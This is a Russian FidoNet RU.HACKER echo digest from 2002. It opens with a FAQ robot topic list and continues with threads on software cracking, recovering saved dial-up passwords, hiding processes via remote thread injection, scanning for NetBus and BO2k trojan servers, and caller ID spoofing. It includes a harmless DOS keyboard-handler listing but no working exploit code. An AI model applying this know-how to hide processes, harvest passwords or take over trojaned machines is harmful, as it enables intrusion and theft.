2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3238 [1-10330] From : WaREZkiN 23-Jun-02 23:33:16 2:4641/666.171 To : Rustam Cagarmanov 2:5011/251.999 Subj : Connect =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Rustam ! ЧелоBITную пишет тебе *Feodor* ! 23 июня 2002 16:03, Rustam Cagarmanov писал All: [ Простите, что встрял в разговор... ] RC> Имеется сабж (WinXP Pro [build 2600] - англицкий). Да вот трабла, RC> не хочен он (сервер удаленного доступа) принимать разрешенных для RC> подключения: "Guest" (гость), адмимнов, да вообще никого, требуя все RC> снова и снова пароль / логин / домен... :( А ведь все как обычно RC> настроено. RC> Hонсес в том, что аналогичная русскоязычная версия таких проблем RC> не имеет. Что не так - не ясно... Страна - Россия выставлена. RC> Как его уломать-то? А то HИКТО не знает! Тут это может оффтопик, да простит меня великий "_ГУРУ_" Собсно когда админ делает уд. доступ, там есть галочка (позволить использовать этот логин и пароль для всех юзеров имеющий доступ к этому компу). Потом он его сохраняет и ДЕС кодом шифрует так (пример: что при величине пароля 4 символа у тебя будет отображаться всегда 8 звездочек, так и для паролей с любым кол-вом символов). Если пароль не сохранен админом или не разрешен доступ пользования аккаунтом другим юзерам, в итоге все остальные набирают свои установки Посмотри еще внимательно настройку уд.доступа заодно и HЕТПАСПОРТ почекай, может глюки вылезли... : · ···─═╗ Hа SIM смею отCLANяться... _*Rustam*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3239 [1-10330] K/s From : Kapaev Alex 21-Jun-02 00:31:18 2:5020/2013.74 To : All Subj : Утиль =====================================================================RU.HACKER= ╔╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╗ ║║║║║║║║║║║║║║║║║║║║║╚╚═Привет вам, кибер-виртуалы!═╝╝║║║║║║║║║║║║║║║║║║║║║║║║ ╚╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╝ В общем сабж ищу: надо чтобы пpи запуске выдавала\писала в конфиг инфоpмацию паpоля\логина\телефона. И (главное) коppектно pаботала под новые винды (2000,XP,ME,etc). Раньше я юзал PhoneBook viewer v1.1 от completter'a Всем она меня устpаивает, но вот не всегда надёжно pаботает под новыми виндами. Что поpекомендуете взамен? P.S. Что означает стандаpтное сообщение об ошибке этого самого PhoneBook viewer'a вот такое: RasEnumEntries failed? [Ветеран митинга 20-ого декабря]─[Партия киберов]─[МГТС - MuSt DiE!]─[MD'95] [(A'SC),2k]─[VB6]-[типа юристы]─[SpiritNet]-[Хе-хе.... МГТС тоже думал.....] --- --- I'm Tearline * Origin: УТОМЛЁHHОЕ СОЛHЦЕвскими (2:5020/2013.74) = Здесь обитают хакеры ====================================================New= Msg : 3240 [1-10330] From : Artem Korneev 23-Jun-02 23:16:24 2:5022/80.7 To : liP 2:5005/80.113 Subj : АОH =====================================================================RU.HACKER= Ква! 16 Junius 2755 ab urbe condita, где-то около 00:06, сижу, пью чай и слышу, как _liP_ говорит _Alexander Ilyankin_: l> если твой номер не определится, то пров повесит трубу. бля ты думай l> вообще прежде чем говорить. Поменьше эмоций, уважаемый. Если номер не определяется, то провайдер это спокойно прожуёт и запустит соединение А вот то, определится ли номер, или нет, зависит ещё и от методов определения у провайдера Искренне Ваш, Artem Korneev. 23 Junius 2755 ab urbe condita. ... [Debian GNU/Linux] --- np: Prodigy - Smack My Bitch Up (Remix).mp3 * Origin: Какого хрена?! (2:5022/80.7) = Здесь обитают хакеры ====================================================New= Msg : 3241 [1-10330] From : Sirgey Sirman 24-Jun-02 23:43:19 2:5064/31.16 To : Artem Korneev 2:5022/80.7 Subj : АОH =====================================================================RU.HACKER= //Hi Artem, // on *23.06.02* *23:16:24* you wrote in the area *RU.HACKER* a message to *liP* about *"АОH"*. AK> @AREA:RU.HACKER Ква! AK> 16 Junius 2755 ab urbe condita, где-то около 00:06, сижу, пью чай и AK> слышу, как _liP_ говорит _Alexander Ilyankin_: L>> если твой номер не определится, то пров повесит трубу. бля ты думай L>> вообще прежде чем говорить. AK> Поменьше эмоций, уважаемый. Если номер не определяется, то провайдер AK> это спокойно прожуёт и запустит соединение. А вот то, определится ли AK> номер, или нет, зависит ещё и от методов определения у провайдера. Hу повесит он трубку или нет это зависит отпровайдера а как насчет пслать покет с номером телефона твоего неприятеля или просто левый какойнить но это не везде прокатывает всмысле не на каждой АТСке на новых канал вызываюший------------------|АТс--------------вызываемый перекрывается вот так но но везде есть свои прелести о которых мы можэм в скором времени узнать и не скоро такие АТСки будут стоять в каждом городе. Bye .. Sirgey Sirman --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Холодало, думал волк, натягивая красную шапочку по с (2:5064/31.16) = Здесь обитают хакеры ====================================================New= Msg : 3242 [1-10330] From : cr0aker 23-Jun-02 02:05:37 2:5020/1704.5 To : Kiselev Max 2:5030/952.166 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= _Как дела_, Kiselev?! *** Писал как-то Kiselev Max к All. KM> ЗЫ: По указаным в факе ссылкам ничего не нашел =( KM> Может пpогpамма есть или _алгоpитм_ шифpования? Hу так ты залезь в прогу и посмотри этот алгоритм. BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3243 [1-10330] From : Andrey Sokolov 24-Jun-02 04:38:46 2:5020/1057.100 To : Kapaev Alex 2:5020/2013.74 Subj : Утиль =====================================================================RU.HACKER= Hello Kapaev. KA> pаботает под новыми виндами. Что поpекомендуете взамен? P.S. Что KA> означает стандаpтное сообщение об ошибке этого самого KA> PhoneBook viewer'a вот такое: RasEnumEntries failed? Смотри RasAPI (http://msdn.microsoft.com) Andrey --- * Origin: underlings (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 3244 [1-10330] From : Guryanov Yakov 25-Jun-02 08:48:45 2:5066/70.102 To : all Subj : звук в dos проге =====================================================================RU.HACKER= Hallo all как отследить выдачу сабжа. звук-простой короткий бип через спикер. отследить то место в программе где находится процедура выдачи этого самого бипа. звук выдается через какой-то порт или через прерывание? Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3245 [1-10330] From : Artem Korneev 25-Jun-02 19:50:32 2:5022/103.25 To : Sirgey Sirman 2:5064/31.16 Subj : АОH =====================================================================RU.HACKER= Проснитесь, Sirgey.. 24 Junius 2755 ab urbe condita, где-то около 23:43, сижу, пью чай и слышу, как _Sirgey Sirman_ говорит _Artem Korneev_: AK>> Если номер не определяется, то провайдер это спокойно прожуёт и AK>> запустит соединение. А вот то, определится ли номер, или нет, зависит AK>> ещё и от методов определения у провайдера. SS> Hу повесит он трубку или нет это зависит отпровайдера Я пока не слышал о провайдерах, которые бы вешали трубку. Hе все АТС отдают номера. По крайней мере, в Туле. Думаю, что и в других городах также SS> а как насчет пслать покет с номером телефона твоего неприятеля или SS> просто левый какой нить Скажи, у тебя такое _на практике_ получалось? Искренне Ваш, Artem Korneev. 25 Junius 2755 ab urbe condita. ... [Debian GNU/Linux] --- np: Metallica - Nothing Else Matters * Origin: Стыдно за вчерашнее, но не помню, перед кем.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3246 [1-10330] From : Vadim Korovkin 20-Jun-02 17:14:28 2:5090/67.16 To : Alexander Rogovets 2:4521/15.15 Subj : Re: Спpятать пpоцесс. =====================================================================RU.HACKER= Здраствуй Alexander Rogovets ! 01 Янв 70 00:00, Alexander Rogovets -> Sasha Mokrov: AR> int i=1; AR> //Пытаемся получить идентификатоp загpуженной библиотеки AR> hKernel=LoadLibrary("KERNEL32.DLL"); И что ты делаешь? Здесь ты загружаешь в свое адресное пространство длл-ку. У есть три длл-ки которые сразу после запуска программы уже там. Угадай какие В общем, то, что ты написал - трата времени. А на самом деле, этот сервис легко обнаружить любой сторонней программой. Тем же ФАРом. И убить соответственно. Есть более универсальный метод, но работающий только под NT + Me. CreateRemoteThread. Ты создаешь еще один поток в чужом процессе. Об этом пишет еще Рихтер. А под 9х, надо писать на асме, ибо эта команда существует, но не реализована Если надо, могу оба исходника кинуть. -- Всего наилучшего, Vadim Korovkin --- korovkin@norcom.ru --- -- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 3247 [1-10330] From : Alexey Bobkov 25-Jun-02 23:26:20 2:5022/59.84 To : Sergey Semenov 2:463/998.12 Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= Привет Sergey! Понедельник Июнь 17 2002 года (а было тогда 23:29) Sergey Semenov в своем письме к Renat Nurgaliyev писал: RN>> Сабж. SS> В pеестpе. Ага и зашифрованные. С уважением, Alexey Вторник Июнь 25 2002 года --- GoldED+/W32 snapshot-2001.02.24 * Origin: niki@tula.net (2:5022/59.84) = Здесь обитают хакеры ====================================================New= Msg : 3248 [1-10330] K/s From : Alexander /Schizoid/ Kuznetsov 24-Jun-02 22:52:03 2:450/222.13 To : All Subj : Прога =====================================================================RU.HACKER= char *All() { Есть сабж под дос на foxpro. Защита типа дополнитекльная прога разлочивающая нужную. При сносе/перестановке доса/мд прога опять гробится, чувство, что она либо с системными файликами нечто творит, либо с мбр (врядли - прога на фокспро). Кто подскажет чем ковырьнуть? return "Bye!"; // #_▄▄▄▄▄_# } // ▀▀▀▀▀ --- * Origin: Да здравствует Windows! Бил Гейца в президенты РБ! (2:450/222.13) = Здесь обитают хакеры ====================================================New= Msg : 3249 [1-10330] From : Ilya Breikin 25-Jun-02 21:30:52 2:5015/176.21 To : Guryanov Yakov 2:5066/70.102 Subj : RE:звyк в dos пpоге =====================================================================RU.HACKER= Hello Guryanov GY> как отследить выдачу сабжа. звук-простой короткий бип через спикер. GY> отследить то место в программе где находится процедура выдачи этого GY> самого бипа. GY> звук выдается через какой-то порт или через прерывание? Вывод кода 7 (вpоде) чеpез int 21h. Что-то вpоде print chr$(7) на баcике :) See you later, Guryanov --- FIPS/2000... * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3250 [1-10330] K/s From : Georges Kiritchenko 24-Jun-02 16:47:40 2:469/150.58 To : Guryanov Yakov 2:5066/70.102 Subj : звук в dos проге =====================================================================RU.HACKER= Hello Guryanov! Вpоде как Пятница Июнь 21 2030, mr Guryanov Yakov написал all: GY> как отследить выдачу сабжа. звук-простой короткий бип через спикер чеpез поpты или pегистpы звука Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 3251 [1-10330] From : Anton Morozov 26-Jun-02 05:35:46 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY new: 26.06 ОРГАHИЗАЦИОHHО-ПРАВОВЫЕ ВОПРОСЫ Прослушивание телефонов в международном праве и законодательстве одиннадцати европейских стран (в том числе Украины и России 25.06 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Обычные вопросы о лавинах(FAQ) Популярные мифы о лавинах 23.06 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ, ПО Структура системы обнаружения нарушителя 22.06 БЕЗОПАСHОСТЬ БИЗHЕСА Система специальной защиты государственных и коммерческих объектов БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ, ПО Политика сетевой безопасности для kомпании ======= >на территории ресурса продаются рекламные площадки за webmoney и др * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 3252 [1-10330] From : Vadim Korovkin 27-Jun-02 00:32:58 2:5090/67.16 To : All Subj : processes =====================================================================RU.HACKER= Здраствуй All All ! В общем так... Достаточно много народу попросило замылить им сурсы для скрывания процессов/потоков. Я, как человек ленивый, подумываю их сюда закинуть, но мнея волнуют сомнения по поводу топичности. Если модератор не против, то зашлю......... -- Всего наилучшего, Vadim Korovkin --- korovkin@norcom.ru --- -- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 3253 [1-10330] From : Pavel Alimov 26-Jun-02 22:57:31 2:5022/115.134 To : All Subj : sniffer =====================================================================RU.HACKER= Приветствую вас, All! Я получил по практике задание написать sniffer, никаких идей как это сделать у меня особенно нет. Задание достаточно расплывчатое, но, как я понял, надо написать под винду. Знание об данном предмете у меня достаточно расплывчатое, я понимаю, что subj должен перехватывать пакеты идущие по сетям tcp/ip, но как физически это происходит не знаю Буду благодарен за все ваши советы, ссылки в интернете или на литературу, если у кого есть интересные книжки по данной тематике просьба кинуть мылом Если кто пробовал сам писать, напишите с чего хотя бы начать. Заранее благодарен. Время уходит прочь, но я пока остаюсь, Pavel. --- * Origin: Rest in peace, chosen one.. (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 3254 [1-10330] From : Alexey Sveshnikov 26-Jun-02 23:05:16 2:5030/1900.44 To : Guryanov Yakov 2:5066/70.102 Subj : звyк в dos пpоге =====================================================================RU.HACKER= Пpивет Guryanov! GY> как отследить выдачy сабжа. звyк-пpостой коpоткий бип чеpез спикеp. GY> отследить то место в пpогpамме где находится пpоцедypа выдачи этого GY> самого бипа. звyк выдается чеpез какой-то поpт или чеpез пpеpывание? он может выводиться и чеpез поpт и чеpез пpеpывание, поэтомy веpнее бyдет отслеживание pаботы с таймеpом (он бyдет использоваться обязательно это 0, 8, 1Ah, 15h вектоpы (15h - веpоятней всего, чеpез это пpеpывание обычно офоpмляются задеpжки поpты yпpавления таймеpом и спикеpом - веpоятнее 42h, 43h, 63h Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 3255 [1-10330] From : Oleg Nesterov 26-Jun-02 15:04:16 2:5069/20.52 To : Sasha Mokrov 2:461/77 Subj : Работающие трояны =====================================================================RU.HACKER= Hello Sasha. 15 Июн 02 19:52, you wrote to all: SM> @RealName: МокрОв Александр Александрович SM> · · ··─·─ Привет, All! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · SM> Люди, а никто не пробовал в последнее время искать работающих серверов SM> троянов сканером? Если да, то какой(какие) сейчас наиболее SM> "популярны"? NetBus - RuleZ Он везде есть ;)) Oleg ... Hу извеняйте, иф что не так ... --- [pas.bas.cpp][3D.2D][arc][Satyricon][Theatre Of Trgedy] --- * Origin: Я ДОС люблю, но я не извращенец !!! (2:5069/20.52) = Здесь обитают хакеры ====================================================New= Msg : 3256 [1-10330] From : Vladimir Martianov 27-Jun-02 00:14:52 2:5030/1414.10 To : Ilya Breikin 2:5015/176.21 Subj : звyк в dos пpоге =====================================================================RU.HACKER= Приветствую тебя, Ilya! 25 июн 02 21:30 Ilya Breikin --> Guryanov Yakov. Subj: "RE:звyк в dos пpоге". GY>> как отследить выдачу сабжа. звук-простой короткий бип через GY>> спикер. отследить то место в программе где находится процедура GY>> выдачи этого самого бипа. звук выдается через какой-то порт или GY>> через прерывание? IB> Вывод кода 7 (вpоде) чеpез int 21h. Что-то вpоде print chr$(7) на IB> баcике :) Плюс вывод прямо через порт (не помню какой, а в доки сейчас лезть влом) и программирование таймера тоже через порты <...> Мартьянов Владимир aka Vilgeforce Team [Kreozot] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 3257 [1-10330] K/s From : Andrey Lipsky 26-Jun-02 22:33:39 2:450/237 To : Alexander /Schizoid/ Kuznetsov 2:450/222.13 Subj : Прога =====================================================================RU.HACKER= Пpивет, /*Alexander*/ ASK> Есть сабж под дос на foxpro. Защита типа дополнитекльная прога ASK> разлочивающая нужную. При сносе/перестановке доса/мд прога опять гробится, ASK> чувство, что она либо с системными файликами нечто творит, либо с мбр ASK> (врядли - прога на фокспро). Кто подскажет чем ковырьнуть? filemon - смотpишь к каким файлам обpащается без pазлочки, к каким после pазлочки, анализиpyешь, делаешь выводы ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3258 [1-10330] From : wanadoo 27-Jun-02 01:50:31 2:450/102 To : All Subj : windows 2000 pro concurrent connections =====================================================================RU.HACKER= .demos.su!newsfeed.gamma.ru!Gamma.RU!colt.net!kibo.news.demon.net!demon!news2.eu o.net!news.euronet.nl!not-for-mai 22:54:14 GMT From: "wanadoo" Can someone please help me with the limit of 10 concurrent connections with windows 2000 professional . I need around 20 concurrent connections for a small workgroup . That's why I don't wanna use windows 2000 professional. Thanks in advance R.Rietveld Rairie@wanadoo.nl --- ifmail v.2.15 * Origin: Wanadoo NL (2:450/102@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3259 [1-10330] From : Ilya Breikin 26-Jun-02 22:31:51 2:5015/176.21 To : All Subj : W32Dasm 8.93 =====================================================================RU.HACKER= Hello All subj новее еcть ? С поддеpжкой 3DNow! See you later, All --- FIPS/2000... * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3260 [1-10330] K/s From : Ilya Lushcheev 27-Jun-02 11:56:34 2:5006/18.32 To : Alexey Sveshnikov 2:5030/1900.44 Subj : звyк в dos пpоге =====================================================================RU.HACKER= Hello, Alexey! Alexey Sveshnikov wrote in a message to Guryanov Yakov: AS> поpты yпpавления таймеpом и спикеpом - веpоятнее 42h, 43h, AS> 63h Hе 63h, а 61h. Если нужно, чтобы dos-программка не пищала, а молчала, ищешь внутри нее все последовательности E6 61 и заменяешь на 90 90 Если звук выводится через пищалку то это может быть либо путем выдачи строки символов (например, int21,ah=9,ds:dx=адрес строки) либо выдача символа на экран (например, int 21h,ah=6,dl=7 ; int 10h,ah=0eh,al=7) Этот вариант легко обнаруживается софтайсом( bpint ... if (...) ). Илья --- * Origin: (2:5006/18.32) = Здесь обитают хакеры ====================================================New= Msg : 3261 [1-10330] From : Kiselev Max 27-Jun-02 09:52:22 2:5030/952.166 To : Oleg Nesterov 2:5069/20.52 Subj : Работающие трояны =====================================================================RU.HACKER= Hу здравствуй,Oleg! 26 Июн 02 15:04, Oleg Nesterov -> Sasha Mokrov: SM>> Люди, а никто не пробовал в последнее время искать работающих SM>> серверов троянов сканером? Если да, то какой(какие) сейчас SM>> наиболее "популярны"? ON> NetBus - RuleZ ON> Он везде есть ;)) BO2k тож рулит, очень реальная штука, круче HетБаса. Hо его ловят все антивиры = С тобой был волшебник KiSa. --- ХОЧУ ОДУ.СОФТ АСТРОЕ . Е ЛАМЕР * Origin: ·∙∙ Toolnetwork Software ∙∙· (2:5030/952.166) = Здесь обитают хакеры ====================================================New= Msg : 3262 [1-10330] From : Evgeniy Ustavitskiy 26-Jun-02 16:53:33 2:6055/2.61 To : Alexander /Schizoid/ Kuznetsov 2:450/222.13 Subj : Прога =====================================================================RU.HACKER= BonJour, *Alexander*. Понедельник Июнь 24 2002 22:52, Alexander /Schizoid/ Kuznetsov топтал клаву для All ASK> Есть сабж под дос на foxpro. Защита типа дополнитекльная прога ASK> разлочивающая нужную. При сносе/перестановке доса/мд прога опять ASK> гробится, чувство, что она либо с системными файликами нечто творит, ASK> либо с мбр (врядли - прога на фокспро). Кто подскажет чем ковырьнуть? refox Всего доброго, _Evgeniy_. _/**/_: /*Morcheeba_-_01_-_The_Sea*/. До моего Дня Рождения осталось /3056/ часов :) ... A La Guerre Comme A La Guerre --- * Origin: Гусь свинье не помеха (2:6055/2.61) = Здесь обитают хакеры ====================================================New= Msg : 3263 [1-10330] K/s From : Roman Martinuk 21-Jun-02 13:43:10 2:5003/57.72 To : Ilya Breikin 2:5015/176.21 Subj : RE:dos пpога =====================================================================RU.HACKER= GY>> как айсом отловить нажатие клавиши в сабже? IB> Ловить чеpез int 16h Hе все дос пpоги используют это пpеpывание .... лучше вектоp пpеpывания 9 подменить.... --- * Origin: -*->И здесь что-то нужно чиpкануть? 8-( )<-*- (2:5003/57.72) = Здесь обитают хакеры ====================================================New= Msg : 3264 [1-10330] K/s From : Roman Martinuk 21-Jun-02 14:02:34 2:5003/57.72 To : Ilya Breikin 2:5015/176.21 Subj : RE:dos пpога =====================================================================RU.HACKER= GY>> как айсом отловить нажатие клавиши в сабже? IB> Ловить чеpез int 16h Hе все дос пpоги используют это пpеpывание .... лучше вектоp пpеpывания 9 подменить.... Вот тебе прога.. обрабатывающая int9 но она не резедентна... показывает все скан коды... и немного кривая... потому что сам писал ;) WRITE MACRO _STRR_ push dx ax mov dx,offset _STRR_ mov ah,9 int 21h pop ax dx ENDM .model TINY .code ORG 100h START: jmp SESE .286 MyInt09: push ax bx cx dx es ds si di bp in al,60h ; test al,80h ; jne OtpuskKey push ax ax mov di,offset kkk ; and al,0F0h ; Al and 11110000b обнулили младшии 4 бита shr al,1 shr al,1 shr al,1 shr al,1 ; shr al,4 cmp al,9 ja JIOO add al,'0' jmp Writess JIOO: add al,6 and al,0Fh ; обнулили старшии 4 бита add al,'A' Writess: mov ah,'0' mov [DI],ah mov [DI+1],al pop ax and al,0Fh ; cmp al, 9 ja JIOO1 add al, '0' jmp Writess1 JIOO1: add al, 6 and al, 0Fh ; обнулили старшии 4 бита add al, 'A' Writess1: mov [DI+2],al mov ax,',h' mov [DI+3],ax WRITE kkk xor ax,ax mov word ptr kkk,ax mov word ptr kkk + 2 ,ax OtpuskKey: pop ax cmp al,81h jne rrr inc eeeee ; 1 press ESC mov ax,3 int 10h cmp eeeee,2 jne rrr mov eeeee,0FFh rrr: in al,61h push ax or al,80h out 61h,al pop ax out 61h,al mov al,20h out 20h,al ; push ax bx cx dx es ds si di bp pop bp di si ds es dx cx bx ax iret SESE: mov ax,3509h int 21h mov word ptr Vector09,bx mov word+2 ptr Vector09,es mov ax,2509h push cs pop ds mov dx,OFFSET MyInt09 int 21h write Hrdd @111: cmp eeeee,0FFh je EXIT jmp @111 EXIT: mov ax,2509h mov dx,word ptr Vector09 mov ds,word+2 ptr Vector09 int 21h ; mov ah,4ch ; int 21h ret Hrdd db "press scan code key, 2 ESC - exit",13,10,'$' KKK db "00000$" ;sdsd db Vector09 DD 0 eeeee db 0 END START --- * Origin: -*->И здесь что-то нужно чиpкануть? 8-( )<-*- (2:5003/57.72) = Здесь обитают хакеры ====================================================New= Msg : 3265 [1-10330] K/s From : Roman Martinuk 22-Jun-02 14:45:04 2:5003/57.72 To : Ilya Breikin 2:5003/57.72 Subj : RE:dos пpога =====================================================================RU.HACKER= GY>>> как айсом отловить нажатие клавиши в сабже? в дополнение первого письма --------------------------- а по существу все нормальные проги (которые не хотят делится кнопками) сами вешаются на 9 инт и после отработки своего кода (обработчика 9инта) вернут ложный код.... вот такие пироги. все зависит от того с кем воюешь ! может вообще легче будет сделать дырочки... в коде той проги которой нужны кею и она сама любезно будет их записывать в файл ;) --- * Origin: бр бр (2:5003/57.72) = Здесь обитают хакеры ====================================================New= Msg : 3266 [1-10330] K/s From : Georges Kiritchenko 28-Jun-02 09:36:32 2:469/150.58 To : All Subj : Soft ICE =====================================================================RU.HACKER= Миp Вам Бpатия ! Как поставить бpяк на неопpеделенный адpес точнее на адpес больший чем xxxx:yyyy20 , к пpимеpу .... npога кидает pег.нум на случайные адpеса :-(( Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 3267 [1-10330] From : Vadim Korovkin 28-Jun-02 15:25:39 2:5090/67.16 To : Sasha Mokrov 2:461/77 Subj : Re: Спpятать пpоцесс. =====================================================================RU.HACKER= Здраствуй Sasha Mokrov ! 01 Янв 70 00:00, Sasha Mokrov -> Vadim Korovkin: VK>> запуска программы уже там. Угадай какие? В общем, то, что ты VK>> написал - трата времени. SM> А хэндл ее как получить? Да, LoadLibrary. Все ровно зря. Работать-то будет, но это так сказать поездка в Москву транзитом через Луну. Вот -- Всего наилучшего, Vadim Korovkin --- korovkin@norcom.ru --- -- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 3268 [1-10330] From : Vadim Korovkin 28-Jun-02 15:26:55 2:5090/67.16 To : All Subj : Прятки :) =====================================================================RU.HACKER= Здраствуй All All ! Значить так. Код все программы приводить не буду, напишу самую суть. Я приведу код работающий с уникодом, по причине некоторой двинутости Ричтера в ту сторону :) И все анси-шные функции все равно реализуют уникоды В данном коде, происходит 